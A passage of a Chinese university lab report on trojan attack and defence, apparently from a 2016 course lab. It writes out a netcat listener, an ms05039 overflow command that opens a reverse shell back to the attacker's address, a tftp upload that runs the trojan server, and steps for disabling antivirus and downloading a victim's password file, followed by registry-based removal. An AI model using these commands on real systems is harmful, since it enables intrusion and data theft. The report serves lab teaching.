欢迎来到天天文库
浏览记录
ID:12984069
大小:1.24 MB
页数:15页
时间:2018-07-20
《厦门理工学院网络与信息安全概论05.》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、《网络与信息安全概论》实验报告实验序号:5 实验项目名称:木马攻击与防范实验学号姓名专业、班实验地点实1-214指导教师林开标实验时间2016-4-25一、实验目的及要求理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。二、实验设备(环境)及要求Windows2000server,虚拟机,winxpSp2三、实验内容与步骤实验任务一:“冰河”木马本实验需要把真实主机作为攻击机,虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机,然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进
2、行查杀。实验任务二:“广外男生”木马本实验将真实机作为攻击机,虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击,最终完全取得虚拟机的控制权。最后学习木马的查杀。四、实验结果与数据处理实验任务一:“冰河”木马步骤1:入侵准备工作根据实验环境将IP地址填入下表,攻防实验服务器IPP1:192.168.0.1本机IPP2:192.168.0.1本机上的虚拟机IPP3:192.168.0.98表1实验IP1)下载和安装木马软件前,关闭杀毒软件的自动防护功能,避免程序会被当作病毒而强行终止。2)运行G_CLIENT.EXE,如图2;图2“冰河”运行主界面3)选择菜单
3、“设置”->“配置服务程序”,如图3;图3设置木马服务4)设置访问口令为“1234567”,其它为默认值,点击“确定”生成木马的服务端程序G_SERVER.EXE。5)将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:gongfangTftp32,如图4。图4将G_SERVER.EXE拷贝到目录C:gongfangTftp326)运行tftpd32.exe,如图5。保持此程序一直开启,用于等待攻击成功后传输木马服务程序。图5tftp服务运行步骤2:进行攻击,将木马放置在被攻击端1)对靶机P3进行攻击,dos窗口运行nc.exenc-v
4、v-l-p99图6正在监听接着再开一个dos窗口,运行ms05039.exe:ms05039192.168.0.98.192.168.0.1991图6攻击成功示意3)在此窗口中运行tftp-i192.168.0.98getg_server.exe将木马服务程序G_server.exe上传到靶机P3上,并直接输入g_server.exe使之运行.图7上载木马程序并运行步骤3:运行木马客户程序控制远程主机1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭,如图8所示。图8添加主机单击“确定”按扭,即可以看到主机面上添加了主机,如图9。图9添加主机后主界面“文件管理器
5、”使用。点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。在文件夹中发现敏感信息“Password”,然后选中文件,在右键菜单中选中“下载文件至...”,在弹出的对话框中选好本地存储路径,点击“保存”。如图10所示。图10下载password.txt文件图11成功下载文件后界面2)“命令控制台”使用。单击“命令控制台”的标签,弹出命令控制台界面,如图11,验证控制的各种命令。图12命令控制台图13展开类命令查看其功能步骤4:删除“冰河”木马A.客户端的自动卸载功能,在“控制命令类”中的“系统控制”里面就有自动卸载功能,执行这个功能,远程主机上的木马就自动
6、卸载了。B.手动卸载,查看注册表,运行>regedit.exe>windows注册编辑器打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun如图16。在目录中发现了一个默认的键值C:WINNTSystem32kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。²打开HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVesionRunservices,如图17。在目录中也发现了一个默认的键值C:WIN
7、NTSystem32kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。图14打开注册表编辑器图15找到目录键值为KERNEL图16找到目录键值为KERNEL图17删除数值数据图18成功删除关联文件实验任务二:“广外男生”木马1)“广外男生”的连接运行gwboy.exe,打开“广外男生”的主程序,主界面如图20。图19“广外男生”主界面进行客户端设置。依次单击“
此文档下载收益归作者所有